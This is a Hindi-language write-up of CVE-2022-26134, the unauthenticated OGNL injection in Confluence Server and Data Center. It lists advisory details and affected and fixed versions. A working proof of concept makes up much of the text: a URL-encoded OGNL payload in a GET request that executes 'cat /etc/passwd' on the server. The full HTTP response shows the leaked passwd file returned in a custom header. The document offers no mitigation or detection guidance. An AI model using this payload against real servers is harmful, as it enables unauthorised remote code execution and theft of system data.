
[CVE-2022-26134] Confluence प्री-ऑथ ऑब्जेक्ट-ग्राफ नेविगेशन लैंग्वेज (OGNL) इंजेक्शन
[CVE-2022-26134] Confluence प्री-ऑथ ऑब्जेक्ट-ग्राफ नेविगेशन लैंग्वेज (OGNL) इंजेक्शन
Confluence, Atlassian द्वारा विकसित एक वेब-आधारित वर्कस्पेस सहयोग उत्पाद है। इसे ऑन-प्रेम या Atlassian Cloud के भाग के रूप में तैनात किया जा सकता है। इसमें 3 मुख्य विशेषताएँ शामिल हैं: पेज, स्पेस और पेज ट्री।
2022-06-02 को 20:00 UTC पर Atlassian ने एक सुरक्षा सलाह जारी की, जो Confluence Server और Confluence Data Center उत्पादों को प्रभावित करने वाली रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता से संबंधित है। CVE-2022-26134 भेद्यता के बारे में विस्तृत जानकारी आपको नीचे मिलेगी।
सारांश: CVE-2022-26134 - Confluence Server और Data Center में गंभीर स्तर की बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता
सलाह जारी होने की तिथि: 02 Jun 2022
प्रभावित उत्पाद: Confluence Server और Confluence Data Center
प्रभावित संस्करण: Confluence Server और Data Center के सभी समर्थित संस्करण प्रभावित हैं। 1.3.0 के बाद के Confluence Server और Data Center संस्करण प्रभावित हैं।
सुधारे गए संस्करण: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 और 7.18.1
CVE ID: CVE-2022-26134 Confluence प्री-ऑथ ऑब्जेक्ट-ग्राफ नेविगेशन लैंग्वेज (OGNL) इंजेक्शन
प्रूफ ऑफ कॉन्सेप्ट: नमूना अनुरोध 1
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20/etc/passwd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D/ HTTP/1.1
Host: vulnerablehost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
प्रतिक्रिया 1
HTTP/1.1 302
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1654688652451
Set-Cookie: JSESSIONID=47E8CE261CF7355A5625FEF65B4BD7DC; Path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Cmd-Murat: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin confluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash
Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat+%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Murat%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Wed, 08 Jun 2022 11:44:12 GMT
Connection: close
